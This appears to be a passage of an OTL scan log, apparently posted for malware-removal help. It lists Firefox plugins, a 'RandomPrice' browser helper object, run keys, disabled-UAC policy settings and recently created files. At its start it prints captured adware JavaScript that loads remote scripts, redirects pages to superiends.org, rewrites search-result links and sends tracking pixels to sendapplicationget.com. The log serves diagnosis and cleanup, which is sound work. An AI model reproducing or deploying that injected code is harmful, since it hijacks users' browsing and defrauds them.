script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1399/l.js?aoi=1311798366&pid=1399&zoneid=287609&ext=GoSave&systemid=5392771597948072366&ext=GoSave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=rjUGvTw7pc5FrjCKrjU5fHw9rjn8qTU8rjY%3D&eid=1120&hid=5392771597948072366&pid=20014&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"GoSave\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;eg.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;fb.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&& \"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f>2,f=(f&3)<<4|a>>4,l=(a&15)<< 2 | c>>6,h=c&63;isNaN(a)?l=h=64:isNaN(c)&&(h=64);d=d+b.xlat.charAt(n)+b.xlat.charAt(f)+(64==l?\"=\":b.xlat.charAt(l))+(64==h?\"=\":b.xlat.charAt(h))}return d};b._utf8_encode=function(e){if(e&&e.length){for(var d=\"\",b=0;ba?d+=String.fromCharCode(a):(127a?d+=String.fromCharCode(a>>6|192):(d+=String.fromCharCode(a>>12|224),d+=String.fromCharCode(a>>6&63|128)),d+=String.fromCharCode(a&63|128))}return d}return e};b.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g, \"\");for(var d=\"\",b=0;b>2,h=(g&3)<<6|n,d=d+String.fromCharCode(c<<2|k>>4);64!=g&&0f)b+=String.fromCharCode(f),c++;else if(191f)var k=a.charCodeAt(c+ 1),b=b+String.fromCharCode((f&31)<<6|k&63),c=c+2;else var k=a.charCodeAt(c+1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((f&15)<<12|(k&63)<<6|g&63),c=c+3}return b}};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.getParams=function(){var b=location.href.split(\"__pdt\");b.length&&(b=a.l.decode(b[1]));return function(a){var b= {};a.replace(/([^?=&]+)(=([^&]*))?/g,function(a,c,e,g){b[c]=decodeURIComponent(g)});return b}(b.replace(/^.*\\?/,\"\"))};a.getHostname=function(a){var c=document.createElement(\"a\");c.href=a;return c.hostname}},function(){var a=document.createElement(\"div\");a.id=\"__hggasdgjhsagd_once\";a.setAttribute(\"style\",\"display:none;\");var b=document.getElementsByTagName(\"body\")[0];b&&b.appendChild(a)}(),c.pixel=function(){var a=c.Utils.getParams();if(a&&a.cid){var b=c.pixelHostname+\"?\",e=a.sh||\"\",d=a.cid||\"\",m= a.tid||\"\",f=a.adtid||\"\",k=a.pid||\"\",g=a.cc||\"\",n=a.eid||\"\",l=a.hid||\"\",h=a.version?a.version:\"1\",a=a.tid||\"\",q=c.Utils.getHostname(location.href),e={pid:k,cc:g,eid:n,hid:l,v:h,ch:\"0\",cid:d,tid:a,adtid:m,smid:f,pbid:\"0\",oh:encodeURIComponent(q),sh:encodeURIComponent(e)},p;for(p in e)b+=p+\"=\"+e[p]+\"&\";b=b.slice(0,-1);(new Image).src=b}},-1c.Utils.msie||\"undefined\"==typeof window[c.prefix]&&(window[c.prefix]= c))};})();"); FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll () FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation) FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@real.com/nppl3260;version=16.0.3.51: C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.) FF - HKLM\Software\MozillaPlugins\@real.com/nprndlchromebrowserrecordext;version=1.3.3: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.) FF - HKLM\Software\MozillaPlugins\@real.com/nprndlhtml5videoshim;version=1.3.3: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.) FF - HKLM\Software\MozillaPlugins\@real.com/nprndlpepperflashvideoshim;version=1.3.3: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.) FF - HKLM\Software\MozillaPlugins\@real.com/nprpplugin;version=16.0.3.51: C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer) FF - HKLM\Software\MozillaPlugins\@realnetworks.com/npdlplugin;version=1: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader) FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.2: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Admin\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\ [2013-09-18 15:48:01 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{ABDE892B-13A8-4d1b-88E6-365A6E755758}: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-09-18 15:48:01 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\shortcutff@gmail.com: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tn6mwzn8.default\extensions\shortcutff@gmail.com FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.0.2\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.0.2\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014-10-30 12:11:36 | 000,000,000 | ---D | M] [2013-09-13 22:15:21 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Admin\AppData\Roaming\mozilla\Extensions [2014-10-30 21:33:23 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Admin\AppData\Roaming\mozilla\Firefox\Profiles\tn6mwzn8.default\Extensions [2014-10-29 17:42:40 | 000,000,000 | ---D | M] (RandomPrice) -- C:\Users\Admin\AppData\Roaming\mozilla\Firefox\Profiles\tn6mwzn8.default\Extensions\tqR@55.com [2014-02-08 11:55:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Admin\AppData\Roaming\mozilla\Firefox\Profilestn6mwzn8.default\extensions [2014-02-08 11:55:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Admin\AppData\Roaming\mozilla\Firefox\Profilestn6mwzn8.default\extensions\staged [2014-10-30 21:33:23 | 000,979,610 | ---- | M] () (No name found) -- C:\Users\Admin\AppData\Roaming\mozilla\firefox\profiles\tn6mwzn8.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-10-30 12:11:35 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\browser\extensions [2014-10-30 12:11:40 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\mozilla firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [2012-01-12 09:07:32 | 000,183,200 | ---- | M] (McAfee, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npMcAfeeSRPlgn.dll O1 HOSTS File: ([2009-06-10 22:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts O2:[b]64bit:[/b] - BHO: (RandomPrice) - {e825a11c-db79-4872-87d2-f14763c1e324} - C:\ProgramData\RandomPrice\2B6Fp3lvComr6N.x64.dll () O2 - BHO: (RandomPrice) - {e825a11c-db79-4872-87d2-f14763c1e324} - C:\ProgramData\RandomPrice\2B6Fp3lvComr6N.dll () O4:[b]64bit:[/b] - HKLM..\Run: [Energy Management] C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe (Lenovo (Beijing) Limited) O4:[b]64bit:[/b] - HKLM..\Run: [EnergyUtility] C:\Program Files (x86)\Lenovo\Energy Management\Utility.exe (Lenovo(beijing) Limited) O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation) O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) O4 - HKLM..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe File not found O4 - HKLM..\Run: [TkBellExe] C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe (RealNetworks, Inc.) O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation) O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-21-3933479072-2540534226-446759770-1000..\Run: [Facebook Update] C:\Users\Admin\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.) O4 - HKU\S-1-5-21-3933479072-2540534226-446759770-1000..\Run: [GG] C:\Users\Admin\AppData\Local\GG\Application\gghub.exe (GG Network S.A.) O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0 O7 - HKU\S-1-5-21-3933479072-2540534226-446759770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O8:[b]64bit:[/b] - Extra context menu item: E&ksportuj do programu Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000 File not found O8:[b]64bit:[/b] - Extra context menu item: Sothink Flash Downloader For IE - C:\Program Files (x86)\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm () O8 - Extra context menu item: E&ksportuj do programu Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000 File not found O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Program Files (x86)\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm () O9 - Extra Button: Wyślij do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll (Microsoft Corporation) O9 - Extra 'Tools' menuitem : Wyślij &do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll (Microsoft Corporation) O9 - Extra Button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\Office12\REFIEBAR.DLL (Microsoft Corporation) O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files (x86)\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm () O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files (x86)\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm () O13[b]64bit:[/b] - gopher Prefix: missing O13 - gopher Prefix: missing O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 192.168.1.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{20C1CDD0-D7BF-4F02-ACB5-18A2AB8D9162}: DhcpNameServer = 192.168.112.2 149.156.96.9 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{947A6CF5-722B-4099-8E8F-40997616B348}: DhcpNameServer = 192.168.1.1 192.168.1.1 O18:[b]64bit:[/b] - Protocol\Handler\grooveLocalGWS - No CLSID value found O18:[b]64bit:[/b] - Protocol\Handler\ms-help - No CLSID value found O18 - Protocol\Handler\grooveLocalGWS {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~2\MICROS~1\Office12\GRA32A~1.DLL (Microsoft Corporation) O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation) O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation) O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation) O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\PROGRA~2\MICROS~1\Office12\GR469A~1.DLL (Microsoft Corporation) O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2014-10-29 00:34:56 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ] O32 - AutoRun File - [2012-09-25 18:55:04 | 000,000,065 | R--- | M] () - G:\autorun.inf -- [ CDFS ] O33 - MountPoints2\{3e4f9c66-3e83-11e4-861c-24fd529e0b87}\Shell - "" = AutoRun O33 - MountPoints2\{3e4f9c66-3e83-11e4-861c-24fd529e0b87}\Shell\AutoRun\command - "" = F:\LG_PC_Programs.exe O33 - MountPoints2\{fc50b51b-1c98-11e3-82fa-24fd529e0b87}\Shell - "" = AutoRun O33 - MountPoints2\{fc50b51b-1c98-11e3-82fa-24fd529e0b87}\Shell\AutoRun\command - "" = G:\Installer.exe -- [2011-10-22 18:55:30 | 000,580,608 | R--- | M] (RELOADED) O34 - HKLM BootExecute: (autocheck autochk *) O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %* O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %* O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2014-10-30 21:51:01 | 000,000,000 | ---D | C] -- C:\FRST [2014-10-30 12:11:35 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox [2014-10-29 17:42:41 | 000,000,000 | ---D | C] -- C:\ProgramData\RandomPrice [2014-10-29 00:52:30 | 000,000,000 | ---D | C] -- C:\ProgramData\FLEXnet [2014-10-29 00:46:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Macrovision Shared [2014-10-29 00:46:16 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk [2014-10-29 00:45:39 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Autodesk Shared [2014-10-29 00:45:39 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\Autodesk [2014-10-29 00:45:39 | 000,000,000 | ---D | C] -- C:\Program Files\Autodesk [2014-10-29 00:44:00 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Autodesk Shared [2014-10-29 00:43:36 | 002,430,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\D3DCompiler_41.dll [2014-10-29 00:43:36 | 001,846,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\D3DCompiler_41.dll [2014-10-29 00:43:36 | 000,520,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\d3dx10_41.dll [2014-10-29 00:43:36 | 000,453,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\d3dx10_41.dll [2014-10-29 00:43:33 | 005,425,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\D3DX9_41.dll [2014-10-29 00:43:33 | 004,178,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\D3DX9_41.dll [2014-10-29 00:43:19 | 003,927,248 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\d3dx9_30.dll [2014-10-29 00:43:19 | 002,388,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\d3dx9_30.dll [2014-10-29 00:40:08 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Roaming\Autodesk [2014-10-29 00:40:08 | 000,000,000 | ---D | C] -- C:\ProgramData\Autodesk [2014-10-29 00:34:56 | 000,000,000 | ---D | C] -- C:\Autodesk [2014-10-28 12:52:23 | 000,000,000 | ---D | C] -- C:\Users\Admin\IGC [2014-10-28 12:52:23 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Roaming\IGC [2014-10-28 12:42:06 | 000,245,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\unicows.dll [2014-10-28 12:42:05 | 001,060,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MFC71.dll [2014-10-28 12:41:29 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\IGC [2014-10-28 12:41:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free DWG Viewer [2014-10-28 01:15:38 | 000,000,000 | ---D | C] -- C:\ProgramData\Trusted Publisher [2014-10-28 01:15:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\DeltaFix [2014-10-28 01:14:51 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Adblocker [2014-10-28 01:14:31 | 000,000,000 | ---D | C] -- C:\ProgramData\d195380caa514720 [2014-10-28 01:14:30 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\Chromatic Browser [2014-10-28 01:14:29 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\Torch [2014-10-28 01:14:28 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\Comodo [2014-10-27 21:34:39 | 000,000,000 | ---D | C] -- C:\Users\Admin\.dtella [2014-10-27 21:34:35 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dtella@MS [2014-10-27 21:34:34 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Dtella@MS [2014-10-27 21:30:32 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Roaming\DC++ [2014-10-27 21:30:32 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\DC++ [2014-10-27 21:30:25 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DC++ [2014-10-27 21:30:18 | 000,000,000 | ---D | C] -- C:\Program Files\DC++ [2014-10-25 17:22:26 | 000,000,000 | ---D | C] -- C:\Users\Admin\Desktop\putty [2014-10-25 17:06:11 | 000,000,000 | ---D | C] -- C:\cygwin64 [2014-10-25 17:04:15 | 000,000,000 | ---D | C] -- C:\Users\Admin\Desktop\cygwin [2014-10-25 16:58:28 | 000,000,000 | ---D | C] -- C:\cygwin [2014-10-24 20:41:20 | 000,000,000 | ---D | C] -- C:\Users\Admin\Desktop\RPS & White House Records - Książę aka. Slumilioner (2014) [2014-10-24 19:38:43 | 000,000,000 | ---D | C] -- C:\Users\Admin\.thumbnails [2014-10-24 19:31:26 | 000,000,000 | ---D | C] -- C:\Users\Admin\.gimp-2.6 [2014-10-24 19:31:25 | 000,000,000 | ---D | C] -- C:\Users\Admin\Documents\gegl-0.0 [2014-10-24 19:31:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP [2014-10-24 19:31:08 | 000,000,000 | ---D | C] -- C:\Program Files\GIMP-2.0 [2014-10-15 10:42:39 | 000,507,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll [2014-10-15 10:42:39 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll [2014-10-15 10:42:39 | 000,276,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll [2014-10-15 10:37:38 | 001,943,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dfshim.dll [2014-10-15 10:37:38 | 001,131,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dfshim.dll [2014-10-15 10:37:38 | 000,156,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscorier.dll [2014-10-15 10:37:38 | 000,156,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscorier.dll [2014-10-15 10:37:38 | 000,081,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscories.dll [2014-10-15 10:37:38 | 000,073,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscories.dll [2014-10-15 10:27:45 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll [2014-10-15 10:27:44 | 000,710,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe [2014-10-15 10:27:44 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll [2014-10-15 10:27:44 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll 